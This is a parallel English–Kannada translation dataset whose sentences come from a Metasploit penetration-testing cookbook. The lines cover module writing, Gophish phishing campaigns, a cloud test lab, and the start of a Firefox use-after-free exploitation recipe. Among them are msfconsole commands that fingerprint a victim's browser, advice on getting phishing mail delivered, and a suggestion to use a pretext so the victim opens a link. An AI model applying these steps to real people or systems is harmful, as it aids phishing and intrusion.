| {"en":"Next, we will use an if statement to compare the response from the target with the response from our router and, if they match, print and save the result:","translation":"ಮುಂದೆ, ನಾವು ಟಾರ್ಗೆಟ್ನಿಂದ ಪ್ರತಿಕ್ರಿಯೆಯನ್ನು ನಮ್ಮ ರೂಟರ್ನಿಂದ ಪ್ರತಿಕ್ರಿಯೆಯೊಂದಿಗೆ ಹೋಲಿಸಲು ಒಂದು ಹೇಳಿಕೆಯನ್ನು ಬಳಸುತ್ತೇವೆ ಮತ್ತು ಅವು ಹೊಂದಿಕೆಯಾದರೆ, ಫಲಿತಾಂಶವನ್ನು ಮುದ್ರಿಸಿ ಮತ್ತು ಉಳಿಸುತ್ತೇವೆ:","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Save the code into a file named huawei_cwmp.rb in /usr/share/metasploit- framework/modules/auxiliary/scanner/http, load the module using msfconsole, set the IP address or range you want to scan, and run the module:","translation":"ಕೋಡ್ ಅನ್ನು /usr/share/metasploit-framework/modules/auxiliary/scanner/http ನಲ್ಲಿ huawei_cwmp.rb ಎಂಬ ಫೈಲ್ಗೆ ಉಳಿಸಿ, msfconsole ಬಳಸಿ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಲೋಡ್ ಮಾಡಿ, ನೀವು ಸ್ಕ್ಯಾನ್ ಮಾಡಲು ಬಯಸುವ IP ವಿಳಾಸ ಅಥವಾ ಶ್ರೇಣಿಯನ್ನು ಹೊಂದಿಸಿ ಮತ್ತು ಮಾಡ್ಯೂಲ್ ಅನ್ನು ರನ್ ಮಾಡಿ:","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Since we are saving the output to the current workspace, we can use the host and services command to display the result of the scan:","translation":"ನಾವು ಪ್ರಸ್ತುತ ಕಾರ್ಯಕ್ಷೇತ್ರಕ್ಕೆ ಔಟ್ಪುಟ್ ಅನ್ನು ಉಳಿಸುತ್ತಿರುವುದರಿಂದ, ಸ್ಕ್ಯಾನ್ನ ಫಲಿತಾಂಶವನ್ನು ಪ್ರದರ್ಶಿಸಲು ನಾವು ಹೋಸ್ಟ್ ಮತ್ತು ಸೇವೆಗಳ ಆಜ್ಞೆಯನ್ನು ಬಳಸಬಹುದು:","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"In this chapter, we will cover the following recipes:","translation":"ಈ ಅಧ್ಯಾಯದಲ್ಲಿ, ನಾವು ಕೆಳಗಿನ ಪಾಕವಿಧಾನಗಳನ್ನು ಒಳಗೊಳ್ಳುತ್ತೇವೆ:","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"As a penetration tester, knowing how to write your own module, or simply adding a new target to an existing module, is a great skill to have.","translation":"ಒಬ್ಬ ನುಗ್ಗುವ ಪರೀಕ್ಷಕನಾಗಿ, ನಿಮ್ಮ ಸ್ವಂತ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಹೇಗೆ ಬರೆಯುವುದು ಅಥವಾ ಅಸ್ತಿತ್ವದಲ್ಲಿರುವ ಮಾಡ್ಯೂಲ್ಗೆ ಹೊಸ ಗುರಿಯನ್ನು ಸೇರಿಸುವುದು ಹೇಗೆ ಎಂದು ತಿಳಿದುಕೊಳ್ಳುವುದು ಉತ್ತಮ ಕೌಶಲ್ಯವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Mixins are comprehensive mechanisms in the Ruby language that provide functionality for a module.","translation":"ಮಿಕ್ಸಿನ್ಗಳು ರೂಬಿ ಭಾಷೆಯಲ್ಲಿನ ಸಮಗ್ರ ಕಾರ್ಯವಿಧಾನಗಳಾಗಿವೆ, ಅದು ಮಾಡ್ಯೂಲ್ಗಾಗಿ ಕಾರ್ಯವನ್ನು ಒದಗಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Version detection is crucial in penetration testing.","translation":"ನುಗ್ಗುವ ಪರೀಕ್ಷೆಯಲ್ಲಿ ಆವೃತ್ತಿ ಪತ್ತೆಹಚ್ಚುವುದು ಮುಖ್ಯವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Exploiting Windows 10 machines is a common attack vector.","translation":"ವಿಂಡೋಸ್ 10 ಯಂತ್ರಗಳನ್ನು ಶೋಷಿಸುವುದು ಒಂದು ಸಾಮಾನ್ಯ ದಾಳಿಯ ಮಾರ್ಗವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Wireless MITM attacks can be set up using Metasploit.","translation":"ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ ಬಳಸಿ ವೈರ್ಲೆಸ್ MITM ದಾಳಿಗಳನ್ನು ಸ್ಥಾಪಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"User Account Control (UAC) can be bypassed.","translation":"ಬಳಕೆದಾರ ಖಾತೆ ನಿಯಂತ್ರಣ (UAC) ಅನ್ನು ಬೈಪಾಸ್ ಮಾಡಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Windows binaries can be backdoored.","translation":"ವಿಂಡೋಸ್ ಬೈನರಿಗಳನ್ನು ಬ್ಯಾಕ್ಡೋರ್ ಮಾಡಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Metasploit can be installed on a Windows machine.","translation":"ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ ಅನ್ನು ವಿಂಡೋಸ್ ಯಂತ್ರದಲ್ಲಿ ಸ್ಥಾಪಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Vulnerability assessment is a key part of the process.","translation":"ದೌರ್ಬಲ್ಯ ಮೌಲ್ಯಮಾಪನ ಪ್ರಕ್ರಿಯೆಯ ಪ್ರಮುಖ ಭಾಗವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Windows Remote Management (WinRM) can be used for scanning.","translation":"ಸ್ಕ್ಯಾನಿಂಗ್ಗಾಗಿ ವಿಂಡೋಸ್ ರಿಮೋಟ್ ಮ್ಯಾನೇಜ್ಮೆಂಟ್ (WinRM) ಅನ್ನು ಬಳಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Creating workspaces is a useful feature.","translation":"ಕೆಲಸದ ಸ್ಥಳಗಳನ್ನು ರಚಿಸುವುದು ಒಂದು ಉಪಯುಕ್ತ ವೈಶಿಷ್ಟ್ಯವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Website attack vectors are often exploited.","translation":"ವೆಬ್ಸೈಟ್ ದಾಳಿ ವೆಕ್ಟರ್ಗಳನ್ನು ಹೆಚ್ಚಾಗಿ ಬಳಸಿಕೊಳ್ಳಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Windows Management Instrumentation (WMI) is a tool.","translation":"ವಿಂಡೋಸ್ ಮ್ಯಾನೇಜ್ಮೆಂಟ್ ಇನ್ಸ್ಟ್ರುಮೆಂಟೇಶನ್ (WMI) ಒಂದು ಸಾಧನವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Performing wireless penetration tests with Metasploit is possible.","translation":"ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ನೊಂದಿಗೆ ವೈರ್ಲೆಸ್ ನುಗ್ಗುವ ಪರೀಕ್ಷೆಗಳನ್ನು ಮಾಡುವುದು ಸಾಧ್ಯ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Virtual Network Computing (VNC) can be used for remote injection.","translation":"ರಿಮೋಟ್ ಇಂಜೆಕ್ಷನ್ಗಾಗಿ ವರ್ಚುವಲ್ ನೆಟ್ವರ್ಕ್ ಕಂಪ್ಯೂಟಿಂಗ್ (VNC) ಅನ್ನು ಬಳಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The book discusses various attack vectors.","translation":"ಪುಸ್ತಕವು ವಿವಿಧ ದಾಳಿ ವೆಕ್ಟರ್ಗಳನ್ನು ಚರ್ಚಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"System scraping can be done using WinEnum.","translation":"WinEnum ಬಳಸಿ ಸಿಸ್ಟಮ್ ಸ್ಕ್ರೇಪಿಂಗ್ ಮಾಡಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Exploiting a Windows Server machine is a common goal.","translation":"ವಿಂಡೋಸ್ ಸರ್ವರ್ ಯಂತ್ರವನ್ನು ಶೋಷಿಸುವುದು ಒಂದು ಸಾಮಾನ್ಯ ಗುರಿಯಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The user interface (UI) is an important aspect.","translation":"ಬಳಕೆದಾರ ಇಂಟರ್ಫೇಸ್ (UI) ಒಂದು ಪ್ರಮುಖ ಅಂಶವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"UDP service sweepers are used for reconnaissance.","translation":"ಗುರುತಿಸುವಿಕೆಗಾಗಿ UDP ಸೇವಾ ಸ್ವೀಪರ್ಗಳನ್ನು ಬಳಸಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The book provides references to virtual networks.","translation":"ಪುಸ್ತಕವು ವರ್ಚುವಲ್ ನೆಟ್ವರ್ಕ್ಗಳಿಗೆ ಉಲ್ಲೇಖಗಳನ್ನು ಒದಗಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Vulnerable machines are often targeted.","translation":"ದುರ್ಬಲ ಯಂತ್ರಗಳನ್ನು ಹೆಚ್ಚಾಗಿ ಗುರಿಯಾಗಿಸಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Now that we have the framework ready, we can use the administration dashboard to configure the phishing campaign.","translation":"ಈಗ ನಾವು ಚೌಕಟ್ಟನ್ನು ಸಿದ್ಧಪಡಿಸಿದ್ದೇವೆ, ಫಿಶಿಂಗ್ ಪ್ರಚಾರವನ್ನು ಕಾನ್ಫಿಗರ್ ಮಾಡಲು ನಾವು ಆಡಳಿತ ಡ್ಯಾಶ್ಬೋರ್ಡ್ ಅನ್ನು ಬಳಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To send emails, you first need to configure the SMTP relay details in the Sending Profiles section.","translation":"ಇಮೇಲ್ಗಳನ್ನು ಕಳುಹಿಸಲು, ನೀವು ಮೊದಲು ಕಳುಹಿಸುವ ಪ್ರೊಫೈಲ್ಗಳ ವಿಭಾಗದಲ್ಲಿ SMTP ರಿಲೇ ವಿವರಗಳನ್ನು ಕಾನ್ಫಿಗರ್ ಮಾಡಬೇಕಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"When setting up an email server for phishing campaigns, do not forget to configure SPF, DKIM, and DMARC.","translation":"ಫಿಶಿಂಗ್ ಪ್ರಚಾರಗಳಿಗಾಗಿ ಇಮೇಲ್ ಸರ್ವರ್ ಅನ್ನು ಹೊಂದಿಸುವಾಗ, SPF, DKIM ಮತ್ತು DMARC ಅನ್ನು ಕಾನ್ಫಿಗರ್ ಮಾಡಲು ಮರೆಯಬೇಡಿ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"One way to ensure your phishing emails will get to the intended recipients is to use hosted business email solutions such as Zoho Mail.","translation":"ನಿಮ್ಮ ಫಿಶಿಂಗ್ ಇಮೇಲ್ಗಳು ಉದ್ದೇಶಿತ ಸ್ವೀಕರಿಸುವವರಿಗೆ ತಲುಪುವುದನ್ನು ಖಚಿತಪಡಿಸಿಕೊಳ್ಳಲು ಒಂದು ಮಾರ್ಗವೆಂದರೆ Zoho ಮೇಲ್ನಂತಹ ಹೋಸ್ಟ್ ಮಾಡಿದ ವ್ಯವಹಾರ ಇಮೇಲ್ ಪರಿಹಾರಗಳನ್ನು ಬಳಸುವುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Just go to https://www.zoho.com/mail/, create a free business email account, and you are good to go.","translation":"https://www.zoho.com/mail/ ಗೆ ಹೋಗಿ, ಉಚಿತ ವ್ಯವಹಾರ ಇಮೇಲ್ ಖಾತೆಯನ್ನು ರಚಿಸಿ ಮತ್ತು ನೀವು ಹೋಗಲು ಸಿದ್ಧರಾಗಿರಿ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"In this recipe, I will not cover how to set up and configure a phishing campaign with Gophish.","translation":"ಈ ಪಾಕವಿಧಾನದಲ್ಲಿ, Gophish ನೊಂದಿಗೆ ಫಿಶಿಂಗ್ ಪ್ರಚಾರವನ್ನು ಹೇಗೆ ಹೊಂದಿಸುವುದು ಮತ್ತು ಕಾನ್ಫಿಗರ್ ಮಾಡುವುದು ಎಂಬುದನ್ನು ನಾನು ಒಳಗೊಳ್ಳುವುದಿಲ್ಲ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"You can find the updated documentation at https://gophish.gitbooks.io/ user-guide/content/getting_started.html.","translation":"ನೀವು ನವೀಕರಿಸಿದ ದಸ್ತಾವೇಜನ್ನು https://gophish.gitbooks.io/ user-guide/content/getting_started.html ನಲ್ಲಿ ಕಾಣಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"The objective of this recipe is to show you that you can and should take advantage of cloud technologies.","translation":"ಈ ಪಾಕವಿಧಾನದ ಉದ್ದೇಶವೆಂದರೆ ನೀವು ಕ್ಲೌಡ್ ತಂತ್ರಜ್ಞಾನಗಳ ಲಾಭವನ್ನು ಹೇಗೆ ಪಡೆಯಬಹುದು ಎಂಬುದನ್ನು ತೋರಿಸುವುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Now that you know how to set up and launch a phishing campaign, you can, for example, embed an HTML application link.","translation":"ಫಿಶಿಂಗ್ ಪ್ರಚಾರವನ್ನು ಹೇಗೆ ಹೊಂದಿಸುವುದು ಮತ್ತು ಪ್ರಾರಂಭಿಸುವುದು ಎಂದು ನಿಮಗೆ ತಿಳಿದಿರುವುದರಿಂದ, ನೀವು, ಉದಾಹರಣೆಗೆ, HTML ಅಪ್ಲಿಕೇಶನ್ ಲಿಂಕ್ ಅನ್ನು ಎಂಬೆಡ್ ಮಾಡಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Imagination and practice are your friends; you are not limited to HTA.","translation":"ಕಲ್ಪನೆ ಮತ್ತು ಅಭ್ಯಾಸ ನಿಮ್ಮ ಸ್ನೇಹಿತರು; ನೀವು HTA ಗೆ ಸೀಮಿತರಾಗುವುದಿಲ್ಲ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Learn from the adversary; by reading the latest security reports, you can learn about new attack vectors.","translation":"ಪ್ರತಿಪಕ್ಷದಿಂದ ಕಲಿಯಿರಿ; ಇತ್ತೀಚಿನ ಭದ್ರತಾ ವರದಿಗಳನ್ನು ಓದುವ ಮೂಲಕ, ನೀವು ಹೊಸ ದಾಳಿ ವೆಕ್ಟರ್ಗಳ ಬಗ್ಗೆ ತಿಳಿದುಕೊಳ್ಳಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Setting up a cloud penetration testing lab is an important part of a penetration tester's job.","translation":"ಕ್ಲೌಡ್ ನುಗ್ಗುವ ಪರೀಕ್ಷಾ ಪ್ರಯೋಗಾಲಯವನ್ನು ಸ್ಥಾಪಿಸುವುದು ನುಗ್ಗುವ ಪರೀಕ್ಷಕನ ಕೆಲಸದ ಒಂದು ಮುಖ್ಯ ಭಾಗವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Every day new tools are created and new techniques found, so keep up with the industry.","translation":"ಪ್ರತಿದಿನ ಹೊಸ ಪರಿಕರಗಳನ್ನು ರಚಿಸಲಾಗುತ್ತದೆ ಮತ್ತು ಹೊಸ ತಂತ್ರಗಳನ್ನು ಕಂಡುಹಿಡಿಯಲಾಗುತ್ತದೆ, ಆದ್ದರಿಂದ ಉದ್ಯಮದೊಂದಿಗೆ ನವೀಕೃತವಾಗಿರಿ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"We have to invest a fair amount of our time practicing and mastering the tools of our trade.","translation":"ನಮ್ಮ ವ್ಯಾಪಾರದ ಪರಿಕರಗಳನ್ನು ಅಭ್ಯಾಸ ಮಾಡಲು ಮತ್ತು ಕರಗತ ಮಾಡಿಕೊಳ್ಳಲು ನಾವು ಸಾಕಷ್ಟು ಸಮಯವನ್ನು ಹೂಡಿಕೆ ಮಾಡಬೇಕು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Having a data center where we can set up a lab environment and practice is not always possible and can be quite expensive.","translation":"ನಾವು ಪ್ರಯೋಗಾಲಯದ ವಾತಾವರಣವನ್ನು ಸ್ಥಾಪಿಸಬಹುದಾದ ಮತ್ತು ಅಭ್ಯಾಸ ಮಾಡಬಹುದಾದ ಡೇಟಾ ಕೇಂದ್ರವನ್ನು ಹೊಂದಿರುವುದು ಯಾವಾಗಲೂ ಸಾಧ್ಯವಿಲ್ಲ ಮತ್ತು ಸಾಕಷ್ಟು ದುಬಾರಿಯಾಗಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"With cloud services getting cheaper, faster, and easier to use, we do not have an excuse not to have a penetration testing lab.","translation":"ಕ್ಲೌಡ್ ಸೇವೆಗಳು ಅಗ್ಗವಾಗುತ್ತಿರುವುದರಿಂದ, ವೇಗವಾಗಿ ಮತ್ತು ಬಳಸಲು ಸುಲಭವಾಗುವುದರಿಂದ, ನುಗ್ಗುವ ಪರೀಕ್ಷಾ ಪ್ರಯೋಗಾಲಯವನ್ನು ಹೊಂದದಿರಲು ನಮಗೆ ಯಾವುದೇ ನೆಪವಿಲ್ಲ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Take for example Azure; create a free account, and you get $200 of credit to explore services for 30 days.","translation":"ಉದಾಹರಣೆಗೆ Azure ಅನ್ನು ತೆಗೆದುಕೊಳ್ಳಿ; ಉಚಿತ ಖಾತೆಯನ್ನು ರಚಿಸಿ, ಮತ್ತು 30 ದಿನಗಳವರೆಗೆ ಸೇವೆಗಳನ್ನು ಅನ್ವೇಷಿಸಲು ನೀವು $200 ಕ್ರೆಡಿಟ್ ಪಡೆಯುತ್ತೀರಿ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"One of the biggest concerns with deploying vulnerable machines is to keep them contained and not expose them to the internet.","translation":"ದುರ್ಬಲ ಯಂತ್ರಗಳನ್ನು ನಿಯೋಜಿಸುವ ದೊಡ್ಡ ಕಾಳಜಿಗಳಲ್ಲಿ ಒಂದು ಅವುಗಳನ್ನು ಒಳಗೊಂಡಿರುವುದು ಮತ್ತು ಅವುಗಳನ್ನು ಇಂಟರ್ನೆಟ್ಗೆ ಒಡ್ಡದಿರುವುದು.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"For this, we can create a virtual network, which will create a logically isolated section in Microsoft Azure.","translation":"ಇದಕ್ಕಾಗಿ, ನಾವು ವರ್ಚುವಲ್ ನೆಟ್ವರ್ಕ್ ಅನ್ನು ರಚಿಸಬಹುದು, ಇದು ಮೈಕ್ರೋಸಾಫ್ಟ್ ಅಜುರೆಯಲ್ಲಿ ತಾರ್ಕಿಕವಾಗಿ ಪ್ರತ್ಯೇಕವಾದ ವಿಭಾಗವನ್ನು ರಚಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To learn more about how to create virtual networks, you can go to the following page: https://docs.microsoft.com/en-us/azure/virtual-network/quick-create-portal.","translation":"ವರ್ಚುವಲ್ ನೆಟ್ವರ್ಕ್ಗಳನ್ನು ಹೇಗೆ ರಚಿಸುವುದು ಎಂಬುದರ ಕುರಿತು ಇನ್ನಷ್ಟು ತಿಳಿದುಕೊಳ್ಳಲು, ನೀವು ಈ ಕೆಳಗಿನ ಪುಟಕ್ಕೆ ಹೋಗಬಹುದು: https://docs.microsoft.com/en-us/azure/virtual-network/quick-create-portal.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"However, when we get access to a client machine the reality is different, the operating system may have all the updates but that doesn't apply to all the software running on the machine.","translation":"ಆದರೆ, ನಾವು ಕ್ಲೈಂಟ್ ಯಂತ್ರಕ್ಕೆ ಪ್ರವೇಶ ಪಡೆದಾಗ, ವಾಸ್ತವತೆ ವಿಭಿನ್ನವಾಗಿರುತ್ತದೆ, ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್ ಎಲ್ಲಾ ನವೀಕರಣಗಳನ್ನು ಹೊಂದಿರಬಹುದು ಆದರೆ ಅದು ಯಂತ್ರದಲ್ಲಿ ಚಾಲನೆಯಲ್ಲಿರುವ ಎಲ್ಲಾ ಸಾಫ್ಟ್ವೇರ್ಗಳಿಗೆ ಅನ್ವಯಿಸುವುದಿಲ್ಲ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Client-Side Exploitation and Antivirus BypassChapter 7 [ 262 ] Exploiting a Windows 10 machine In this recipe, we will exploit a use-after-free vulnerability present in nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox on Microsoft Windows.","translation":"ಕ್ಲೈಂಟ್-ಸೈಡ್ ಶೋಷಣೆ ಮತ್ತು ಆಂಟಿವೈರಸ್ ಬೈಪಾಸ್ ಅಧ್ಯಾಯ 7 [ 262 ] ವಿಂಡೋಸ್ 10 ಯಂತ್ರವನ್ನು ಶೋಷಿಸುವುದು ಈ ಪಾಕವಿಧಾನದಲ್ಲಿ, ನಾವು ಮೈಕ್ರೋಸಾಫ್ಟ್ ವಿಂಡೋಸ್ನಲ್ಲಿ ಮೊಜಿಲ್ಲಾ ಫೈರ್ಫಾಕ್ಸ್ನ ಹಲವಾರು ಆವೃತ್ತಿಗಳಲ್ಲಿ nsSMILTimeContainer::NotifyTimeChange() ನಲ್ಲಿ ಇರುವ ಬಳಕೆಯ ನಂತರದ ಉಚಿತ ದೌರ್ಬಲ್ಯವನ್ನು ಬಳಸಿಕೊಳ್ಳುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Getting ready So, before we begin we need to download Mozilla Firefox 41.0 from https://ftp.mozilla. org/pub/firefox/releases/41.0/win32/en-US/Firefox%20Setup%2041.0.exe and install it on our Windows 10 target machine.","translation":"ಸಿದ್ಧತೆ ನಡೆಸಿಕೊಳ್ಳಿ ಆದ್ದರಿಂದ, ನಾವು ಪ್ರಾರಂಭಿಸುವ ಮೊದಲು ನಾವು Mozilla Firefox 41.0 ಅನ್ನು https://ftp.mozilla ನಿಂದ ಡೌನ್ಲೋಡ್ ಮಾಡಬೇಕಾಗಿದೆ. org/pub/firefox/releases/41.0/win32/en-US/Firefox%20Setup%2041.0.exe ಮತ್ತು ಅದನ್ನು ನಮ್ಮ Windows 10 ಟಾರ್ಗೆಟ್ ಯಂತ್ರದಲ್ಲಿ ಸ್ಥಾಪಿಸಿ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"How to do it... As always, good reconnaissance makes all the difference, so we first need to gather information about the browser the victim is using.","translation":"ಅದನ್ನು ಹೇಗೆ ಮಾಡುವುದು... ಯಾವಾಗಲೂ, ಉತ್ತಮ ಪರಿಶೋಧನೆಯು ಎಲ್ಲಾ ವ್ಯತ್ಯಾಸವನ್ನುಂಟುಮಾಡುತ್ತದೆ, ಆದ್ದರಿಂದ ನಾವು ಮೊದಲು ಬಲಿಪಶು ಬಳಸುತ್ತಿರುವ ಬ್ರೌಸರ್ ಬಗ್ಗೆ ಮಾಹಿತಿಯನ್ನು ಸಂಗ್ರಹಿಸಬೇಕಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To help us with this task, we can use the HTTP Client Information Gather1. auxiliary module by specifying the IP address and port of the host to listen on and the URI to use, then use one of your favorite pretexts to make the victim open the link:","translation":"ಈ ಕಾರ್ಯದಲ್ಲಿ ನಮಗೆ ಸಹಾಯ ಮಾಡಲು, ನಾವು HTTP ಕ್ಲೈಂಟ್ ಮಾಹಿತಿ ಸಂಗ್ರಹಣೆ 1 ಅನ್ನು ಬಳಸಬಹುದು. ಆಲಿಸಲು ಹೋಸ್ಟ್ನ IP ವಿಳಾಸ ಮತ್ತು ಪೋರ್ಟ್ ಮತ್ತು ಬಳಸಬೇಕಾದ URI ಅನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸುವ ಮೂಲಕ ಸಹಾಯಕ ಮಾಡ್ಯೂಲ್, ನಂತರ ಬಲಿಪಶು ಲಿಂಕ್ ಅನ್ನು ತೆರೆಯಲು ನಿಮ್ಮ ನೆಚ್ಚಿನ ನೆಪಗಳಲ್ಲಿ ಒಂದನ್ನು ಬಳಸಿ:","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"msf > use auxiliary/gather/browser_info msf auxiliary(gather/browser_info) > set SRVHOST 192.168.216.5 SRVHOST => 192.168.216.5 msf auxiliary(gather/browser_info) > set SRVPORT 80 SRVPORT => 80 msf auxiliary(gather/browser_info) > set URIPATH / URIPATH => / msf auxiliary(gather/browser_info) > run","translation":"msf > use auxiliary/gather/browser_info msf auxiliary(gather/browser_info) > set SRVHOST 192.168.216.5 SRVHOST => 192.168.216.5 msf auxiliary(gather/browser_info) > set SRVPORT 80 SRVPORT => 80 msf auxiliary(gather/browser_info) > set URIPATH / URIPATH => / msf auxiliary(gather/browser_info) > run","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"[*] Auxiliary module running as background job 1. msf auxiliary(gather/browser_info) > [*] Using URL: http://192.168.216.5:80/ [*] Server started. [*] Gathering target information for 192.168.216.150 [*] Sending HTML response to 192.168.216.150","translation":"[*] ಸಹಾಯಕ ಮಾಡ್ಯೂಲ್ ಹಿನ್ನೆಲೆ ಕೆಲಸ 1 ಆಗಿ ಚಾಲನೆಯಲ್ಲಿದೆ. msf auxiliary(gather/browser_info) > [*] URL ಅನ್ನು ಬಳಸುವುದು: http://192.168.216.5:80/ [*] ಸರ್ವರ್ ಪ್ರಾರಂಭವಾಯಿತು. [*] 192.168.216.150 ಗಾಗಿ ಗುರಿ ಮಾಹಿತಿಯನ್ನು ಸಂಗ್ರಹಿಸುವುದು [*] 192.168.216.150 ಗೆ HTML ಪ್ರತಿಕ್ರಿಯೆಯನ್ನು ಕಳುಹಿಸಲಾಗುತ್ತಿದೆ","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"[+] 192.168.216.150 - We have found the following interesting information: [*] 192.168.216.150 - source = Browser allows JavaScript [*] 192.168.216.150 - ua_name = Firefox [*] 192.168.216.150 - ua_ver = 41.0 [*] 192.168.216.150 - arch = x86 Client-Side Exploitation and Antivirus BypassChapter 7 [ 263 ] [*] 192.168.216.150 - os_name = Windows [*] 192.168.216.150 - language = en-US,en;q=0.5","translation":"[+] 192.168.216.150 - ನಾವು ಕೆಳಗಿನ ಆಸಕ್ತಿದಾಯಕ ಮಾಹಿತಿಯನ್ನು ಕಂಡುಕೊಂಡಿದ್ದೇವೆ: [*] 192.168.216.150 - ಮೂಲ = ಬ್ರೌಸರ್ JavaScript ಅನ್ನು ಅನುಮತಿಸುತ್ತದೆ [*] 192.168.216.150 - ua_name = Firefox [*] 192.168.216.150 - ua_ver = 41.0 [*] 192.168.216.150 - arch = x86 ಕ್ಲೈಂಟ್-ಸೈಡ್ ಶೋಷಣೆ ಮತ್ತು ಆಂಟಿವೈರಸ್ ಬೈಪಾಸ್ ಅಧ್ಯಾಯ 7 [ 263 ] [*] 192.168.216.150 - os_name = Windows [*] 192.168.216.150 - ಭಾಷೆ = en-US,en;q=0.5","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Looking at the output, we can see that the victim is running Firefox version 41.0.2. With this information, we can see that there is an exploit we can use on Firefox nsSMILTimeContainer::NotifyTimeChange() with the RCE exploit module.","translation":"ಔಟ್ಪುಟ್ ಅನ್ನು ನೋಡುವಾಗ, ಬಲಿಪಶು ಫೈರ್ಫಾಕ್ಸ್ ಆವೃತ್ತಿ 41.0.2 ಅನ್ನು ಚಲಾಯಿಸುತ್ತಿರುವುದನ್ನು ನಾವು ನೋಡಬಹುದು. ಈ ಮಾಹಿತಿಯೊಂದಿಗೆ, RCE ಶೋಷಣೆ ಮಾಡ್ಯೂಲ್ನೊಂದಿಗೆ Firefox nsSMILTimeContainer::NotifyTimeChange() ನಲ್ಲಿ ನಾವು ಬಳಸಬಹುದಾದ ಶೋಷಣೆ ಇದೆ ಎಂದು ನಾವು ನೋಡಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
